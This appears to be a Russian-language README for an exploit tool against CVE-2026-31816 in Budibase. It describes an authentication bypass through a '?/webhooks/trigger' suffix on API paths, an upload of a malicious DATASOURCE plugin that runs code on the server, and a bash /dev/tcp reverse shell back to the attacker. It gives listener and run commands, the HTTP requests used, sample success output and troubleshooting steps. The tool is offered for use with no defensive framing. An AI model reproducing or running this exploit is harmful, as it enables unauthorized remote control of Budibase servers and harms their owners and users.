
Эксплуатирует CVE-2026-31816 в Budibase для обхода аутентификации, загрузки вредоносного плагина источника данных и выполнения reverse shell для удалённого доступа.
Этот инструмент использует CVE-2026-31816 для установления обратного соединения (reverse shell) с целевым сервером Budibase.
Цепочка атаки: Обход аутентификации → Загрузка плагина DATASOURCE → Выполнение кода на стороне сервера → Обратная оболочка (Reverse Shell)
requests (pip install requests)# 1. Запустите слушатель на машине атакующего
nc -lvnp 4444
# 2. Запустите эксплойт (в другом терминале)
python3 CVE-2026-31816-rshell.py -t http://target:10000 --lhost YOUR_IP --lport 4444
| Параметр | Обязательный | Описание |
|---|---|---|
-t, --target | ✅ | URL целевого сервера Budibase |
--lhost | ✅ | Хост слушателя (ваш IP) |
--lport | ❌ | Порт слушателя (по умолчанию: 4444) |
# IP атакующего: 192.168.1.100
# Целевой Budibase: 192.168.1.128:10000
# Терминал 1 - Запуск слушателя
nc -lvnp 4444
# Терминал 2 - Запуск эксплойта
python3 CVE-2026-31816-rshell.py \
-t http://192.168.1.128:10000 \
--lhost 192.168.1.100 \
--lport 4444
GET /api/integrations?/webhooks/trigger
Если возвращается 200, цель уязвима к обходу аутентификации.
{
"type": "datasource",
"schema": { ... }
}
Плагины типа DATASOURCE выполняют JavaScript-код на сервере.
// Выполняется при проверке плагина:
bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1'
POST /api/plugin/upload?/webhooks/trigger
Загрузка плагина с обходом аутентификации. Код выполняется во время проверки.
┌─────────────┐ ┌─────────────┐ ┌─────────────┐
│ Attacker │ │ Target │ │ Listener │
│ │ │ Server │ │ (nc) │
│ │ │ │ │ │
│ exploit ────┼────►│ Upload │ │ │
│ │ │ Plugin │ │ │
│ │ │ Execute │────►│ Listen │
│ │ │ Code │◄────┤ Reverse │
│ │ │ │ │ Connect │
└─────────────┘ └─────────────┘ └─────────────┘
============================================================
CVE-2026-31816 - Reverse Shell Exploit
============================================================
[*] Target: http://192.168.1.128:10000
[*] Reverse shell: 192.168.1.100:4444
[*] Checking vulnerability...
[+] Target is vulnerable!
[*] Creating reverse shell plugin targeting 192.168.1.100:4444
[*] Uploading reverse shell plugin...
[*] Status: 200
[+] Plugin installed successfully!
============================================================
[+] SUCCESS! Check your listener!
============================================================
Возможные причины:
Решения:
# Проверка сетевой связности
ping YOUR_IP
# Проверка брандмауэра
sudo ufw allow 4444/tcp
# Попробуйте другой порт
nc -lvnp 8080
Возможные причины:
Решения:
# Проверьте вручную, существует ли уязвимость
curl -s "http://target:10000/api/integrations?/webhooks/trigger"
# Если возвращается JSON, уязвимость существует